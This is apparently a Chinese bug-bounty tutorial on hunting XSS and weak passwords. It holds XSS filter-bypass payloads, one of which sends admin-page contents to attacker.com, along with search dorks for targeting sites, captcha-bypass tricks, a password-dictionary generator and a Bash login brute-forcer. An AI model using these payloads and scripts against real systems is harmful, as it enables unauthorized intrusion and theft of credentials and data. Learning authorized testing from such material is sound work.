别只盯着SQL注入了！聊聊SRC挖掘中那些被忽视的‘低垂果实’：XSS与弱口令实战复盘

别只盯着SQL注入了！聊聊SRC挖掘中那些被忽视的‘低垂果实’：XSS与弱口令实战复盘

在安全圈摸爬滚打几年后，我发现一个有趣的现象：80%的新手挖洞者会像发现新大陆一样扑向SQL注入，却对触手可得的XSS和弱口令视而不见。这就像在果园里，所有人都挤在最高的苹果树下搭梯子，却没人弯腰捡地上熟透的果子。去年某次企业SRC活动中，我仅用两周就通过这两种"低垂果实"斩获27个有效漏洞，其中还包括3个高危案例。本文将分享如何像老猎人一样，在漏洞丛林中精准捕获这些被低估的猎物。

1. 重新认识漏洞价值金字塔

1.1 为什么说XSS和弱口令是"性价比之王"

在漏洞挖掘的投入产出比公式里，有两个关键变量：发现难度和危害等级。我们来看一组真实数据对比：

注：数据来源于2023年国内三大SRC平台统计报告

从表格可以看出，虽然XSS和弱口令在定级上可能略逊于SQL注入，但它们的时间收益率却高出数个量级。特别是在企业SRC项目中，当你想快速积累有效漏洞数量时，这种差异会直接决定你的排行榜位置。

1.2 被误解的漏洞危害性

很多人认为XSS只是"弹个窗"的把戏，这种认知停留在2010年。现代XSS攻击链可以做到：

• 窃取含HttpOnly标记的Cookie（通过CORS滥用）
• 发起内部网络扫描（利用浏览器WebSocket API）
• 实施钓鱼攻击（动态伪造登录框）

而弱口令更是一把"万能钥匙"，去年某车企数据泄露事件就是因运维人员使用Admin@2023这类密码导致内网沦陷。在实战中，我发现约41%的企业后台存在至少一个默认凭证。

2. XSS狩猎实战手册

2.1 高价值目标快速定位术

不要像无头苍蝇一样见站就测，用这套组合拳锁定肥美猎物：

# FOFA高级搜索语句 title="留言板" && country="CN" body="feedback.php" && header="php" domain="edu.cn" && body="在线咨询"

这三个筛选器分别对应：

1. 传统Web1.0留言板系统
2. PHP开发的反馈模块
3. 教育机构常见交互功能

提示：添加&& status_code="200"过滤失效页面，节省50%无效点击

2.2 突破过滤的现代XSS载荷库

当<script>alert(1)</script>被拦截时，试试这些变形攻击向量：

<!-- SVG标签绕过 --> <svg/onload=alert(document.domain)> <!-- 事件处理器变形 --> <img src=x onerror="javascript:alert(1)"> <!-- 伪协议利用 --> <a href="javascript:fetch('/admin.php').then(r=>r.text()).then(d=>location='http://attacker.com/?leak='+btoa(d))">点击领奖</a>

在最近某金融平台测试中，第三种载荷成功窃取了后台管理员的CSRF Token。记住现代XSS的核心是：避开关键字检测，寻找非常规执行上下文。

2.3 盲打XSS的自动化流水线

手动测试效率太低？用这套Burp Suite工作流：

1. 爬虫阶段：使用Burp Scanner自动发现所有输入点
2. 污染标记：通过Intruder在所有参数插入<xss>标记
3. 结果筛选：在Proxy -> HTTP history过滤<xss>出现次数
4. 精准打击：对返回页面含标记的参数重点测试

某次电商平台测试中，这个方法帮我在2小时内找到7个存储型XSS，其中3个在订单备注字段。

3. 弱口令爆破的艺术

3.1 后台路径发现的六种姿势

除了用inurl:admin/login.php，这些方法更有效：

• JS文件考古：查找/static/js/login.js等文件，常含接口路径
• Favicon哈希：用Shodan搜索http.favicon.hash:-335242539（常见管理系统）
• API文档泄露：尝试/swagger-ui.html、/api-docs等端点
• 证书透明度：通过crt.sh查询子域名，寻找devops、ops等关键词
• GitHub搜索："password" filename:config filename:database
• WAF指纹：识别防火墙类型反推管理系统（如安恒明御WAF对应管理地址）

3.2 验证码绕过实战录

遇到图形验证码？先别急着上OCR，试试这些温柔一刀：

1. 重复使用：捕获第一个验证码响应包，重放10次观察效果
2. 空值测试：删除captcha参数或设为空字符串提交
3. 时间差攻击：在验证码过期前快速提交（常见于5分钟有效期系统）
4. 逻辑漏洞：将is_verify=0改为1直接绕过

上周在某物流系统测试中，方法4成功绕过验证码，随后用admin/admin@123进入运输调度后台。

3.3 智能字典生成算法

别再只用top1000.txt了，用这个Python脚本生成场景化字典：

import itertools company = "jd" # 从whois获取 years = [2020, 2021, 2022, 2023] specials = ["@", "#", "_", "!"] base = [company, "admin", "root", "test"] variations = list(itertools.product(base, specials, years)) with open("smart_dict.txt", "w") as f: for v in variations: f.write(f"{v[0]}{v[1]}{v[2]}\n") f.write(f"{v[0]}{v[2]}{v[1]}\n")

这个算法在测试某互联网公司时，第8次尝试就命中jd_2023!这个运维密码。

4. 从漏洞到奖金的关键一跃

4.1 报告撰写三重奏

同样的漏洞，不同写法可能差2个等级。记住这三个要点：

1. 危害具象化：

   • 错误写法："存在存储型XSS"
   • 正确写法："攻击者可植入恶意脚本窃取客服系统会话，已验证获取到200+用户Cookie"

2. 复现路径影视化：

   [视频步骤] 1. 访问https://example.com/feedback 2. 在内容框输入<svg onload=alert(document.cookie)> 3. 管理员查看投诉列表时触发

3. 修复建议可落地：

   • 不要只说"过滤特殊字符"
   • 应该给出具体代码：

   $clean = htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');

4.2 定级争议解决之道

当平台将你的弱口令定为中危而你认为该高危时，补充这些证据：

• 证明该账号拥有DELETE /api/users权限
• 展示通过该账号获取的敏感数据样本（脱敏后）
• 提供同行业同类漏洞的定级案例

去年某次争议中，我通过证明管理员账号可下载全量用户身份证照片，最终使定级从中危提升为高危。

5. 装备库升级指南

5.1 浏览器插件三件套

1. XSS Hunter：自动捕获盲打XSS的回显
2. Wappalyzer：快速识别后端框架和组件
3. EditThisCookie：实时修改Cookie测试越权

5.2 自制弱口令雷达系统

这个Bash脚本可自动检测常见弱口令：

#!/bin/bash target=$1 common_pass=("admin" "123456" "${target}@2023" "P@ssw0rd") for pass in "${common_pass[@]}"; do response=$(curl -s -o /dev/null -w "%{http_code}" \ -X POST "https://$target/login" \ -d "username=admin&password=$pass") if [ "$response" -eq 302 ]; then echo "[!] Hit: admin/$pass" break fi done

使用时只需./weak_radar.sh example.com，已在5个真实目标验证有效。

6. 避坑地图：那些年我踩过的雷

1. 频率陷阱：某次连续爆破触发账号锁定机制，导致IP被封。现在我会先测试：

   • 错误密码尝试次数限制
   • 锁定时间长度（15分钟/永久）
   • 是否记录恶意IP日志

2. 法律红线：在测试教育机构时，意外获取学生个人信息后立即停止测试并邮件报备。记住：

   • 不查看获取的敏感数据
   • 不保存非必要截图
   • 测试前检查授权范围

3. 蜜罐识别：这些特征可能预示陷阱：

   • 响应速度异常快（<50ms）
   • 返回的Set-Cookie包含honeypot字样
   • 登录失败提示包含详细错误（如"用户名正确但密码错误"）

在一次攻防演练中，我通过观察X-Honeypot: true响应头成功避开了防守方设置的陷阱系统。